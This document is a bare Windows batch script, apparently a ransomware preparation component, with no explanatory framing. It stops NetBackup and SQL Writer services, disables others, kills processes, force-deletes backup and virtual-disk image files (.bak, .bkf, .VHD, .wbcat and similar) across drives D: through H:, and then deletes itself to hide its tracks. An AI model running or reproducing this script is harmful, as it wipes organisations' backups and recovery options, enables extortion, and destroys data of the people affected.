@echo off
                          
                          
                           net stop BMR Boot Service /y
                           net stop NetBackup BMR MTFTP Service /y
                           sc config SQLTELEMETRY start= disabled
                           sc config SQLTELEMETRY$ECWDB2 start= disabled
                           sc config SQLWriter start= disabled
                           sc config SstpSvc start= disabled
                           taskkill /IM mspub.exe /F
                           taskkill /IM mydesktopqos.exe /F
                           taskkill /IM mydesktopservice.exe /F
                           
                           del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
                           del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
                           del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk 
                           del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
                           del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
                           del %0